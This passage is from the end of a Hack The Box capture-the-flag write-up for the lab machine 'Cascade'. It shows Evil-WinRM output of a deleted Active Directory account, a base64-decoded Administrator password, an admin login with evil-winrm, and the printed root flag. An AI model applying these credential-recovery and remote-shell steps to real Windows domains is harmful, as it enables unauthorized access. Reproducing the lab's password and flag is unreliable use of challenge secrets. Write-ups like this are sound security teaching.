DEL:f0cc344d-31e0-4866-bceb-a842791ca059 nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059 objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 132245689883479503 sAMAccountName : TempAdmin sDRightsEffective : 0 userAccountControl : 66048 userPrincipalName : [email protected] uSNChanged : 237705 uSNCreated : 237695 whenChanged : 1/27/2020 3:24:34 AM whenCreated : 1/27/2020 3:23:08 AM PropertyNames : {accountExpires, badPasswordTime, badPwdCount, CanonicalName...} PropertyCount : 42 *Evil-WinRM* PS C:\Users\arksvc\Documents> 

The password is encoded with base64 encoding.

1 2 ~$echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d baCT3r1aN00dles  ## Own Cascade As this account has the same password as the Administrator-account. I can now create a WinRM connection with this account and get the root flag. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ~$ evil-winrm -u Administrator -p baCT3r1aN00dles -i 10.10.10.182 NOTE: Gem::Specification#rubyforge_project= is deprecated with no replacement. It will be removed on or after 2019-12-01. Gem::Specification#rubyforge_project= called from /var/lib/gems/2.5.0/specifications/gyoku-1.3.1.gemspec:17. NOTE: Gem::Specification#rubyforge_project= is deprecated with no replacement. It will be removed on or after 2019-12-01. Gem::Specification#rubyforge_project= called from /var/lib/gems/2.5.0/specifications/logging-2.2.2.gemspec:18. NOTE: Gem::Specification#rubyforge_project= is deprecated with no replacement. It will be removed on or after 2019-12-01. Gem::Specification#rubyforge_project= called from /var/lib/gems/2.5.0/specifications/little-plugger-1.1.4.gemspec:18. NOTE: Gem::Specification#rubyforge_project= is deprecated with no replacement. It will be removed on or after 2019-12-01. Gem::Specification#rubyforge_project= called from /var/lib/gems/2.5.0/specifications/nori-2.6.0.gemspec:17. Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt 82d5991e2570794f503e62a2a650fb4d *Evil-WinRM* PS C:\Users\Administrator\Documents> 

Rooted Cascade! I really loved this box and really enjoyed the writing of this write-up. Did you also liked my write-up? Please consider spending some respect points. My Profile on HTB: https://app.hackthebox.com/profile/224856.com/profile/224856.

Happy Hacking!